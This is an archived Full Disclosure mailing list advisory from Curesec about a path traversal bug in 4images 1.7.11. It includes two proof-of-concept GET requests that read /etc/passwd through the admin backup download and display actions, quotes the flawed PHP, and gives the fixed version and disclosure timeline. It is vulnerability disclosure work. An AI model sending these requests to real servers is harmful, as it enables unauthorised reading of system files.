Full Disclosure mailing list archives

Previous By Date Next
Previous By Thread Next

4images 1.7.11: Path Traversal

From: "Curesec Research Team (CRT)" <crt () curesec com>
Date: Mon, 07 Dec 2015 18:12:49 +0100
Security Advisory - Curesec Research Team

1. Introduction

Affected Product:    4images 1.7.11
Fixed in:            1.7.12
Fixed Version Link:  http://www.4homepages.de/download-4images
Vendor Website:      http://www.4homepages.de/
Vulnerability Type:  Path Traversal
Remote Exploitable:  Yes
Reported to vendor:  09/29/2015
Disclosed to public: 12/02/2015
Release mode:        Coordinated release
CVE:                 Requested, but not assigned
Credits              Tim Coen of Curesec GmbH

2. Vulnerability Description

CVSS

Medium 4.0 AV:N/AC:L/Au:S/C:P/I:N/A:N

Description

When downloading or displaying a backup file, the file Parameter is vulnerable
to directory traversal. This is the case because the get_basefile function
contains a bug. When the passed path name ends with a slash, it will return the
entire path instead of the file name.

By adding ?/ to the file name, an attacker can thus download or display
arbitrary files.

Admin credentials are required to view or download backup files.

3. Proof of Concept


GET /4images/admin/backup.php?action=downloadbackup&file=../../../../../../etc/passwd?/ HTTP/1.1
GET /4images/admin/backup.php?action=showbackup&file=../../../../../../etc/passwd?/ HTTP/1.1

4. Code


        /admin/bachup.php
        if (isset($HTTP_GET_VARS['file']) || isset($HTTP_POST_VARS['file'])) {
          $file = (isset($HTTP_GET_VARS['file'])) ? get_basefile(trim($HTTP_GET_VARS['file'])) : 
get_basefile(trim($HTTP_POST_VARS['file']));
        }
        else {
          $file = "";
        }

        if ($action == "downloadbackup") {
          $size = @filesize(ROOT_PATH.DATABASE_DIR."/".$file);
          header("Content-type: application/x-unknown");
          header("Content-length: $size\n");
          header("Content-Disposition: attachment; filename=$file\n");
          readfile(ROOT_PATH.DATABASE_DIR."/".$file);
          exit;
        }

        /includes/functions.php
        function get_basename($path) {
          $path = str_replace("\\", "/", $path);
          $name = substr(strrchr($path, "/"), 1);
          return $name ? $name : $path;
        }

        function get_basefile($path) {
          $basename = get_basename($path);
          preg_match("#(.+)\?(.+)#", $basename, $regs);
          return isset($regs[1]) ? $regs[1] : $basename;
        }

5. Solution

To mitigate this issue please upgrade at least to version 1.7.12:

http://www.4homepages.de/download-4images

Please note that a newer version might already be available.

6. Report Timeline

09/29/2015 Informed Vendor about Issue
10/21/2015 Reminded Vendor of Disclosure Date
11/03/2015 Vendor releases fix
11/17/2015 CVE Requested (no reply)
12/02/2015 Disclosed to public


Blog Reference:
https://blog.curesec.com/article/blog/4images-1711-Path-Traversal-106.html
 
--
blog:  https://blog.curesec.com
tweet: https://twitter.com/curesec

Curesec GmbH
Curesec Research Team
Romain-Rolland-Str 14-24
13089 Berlin, Germany

_______________________________________________
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/
Previous By Date Next
Previous By Thread Next

Current thread: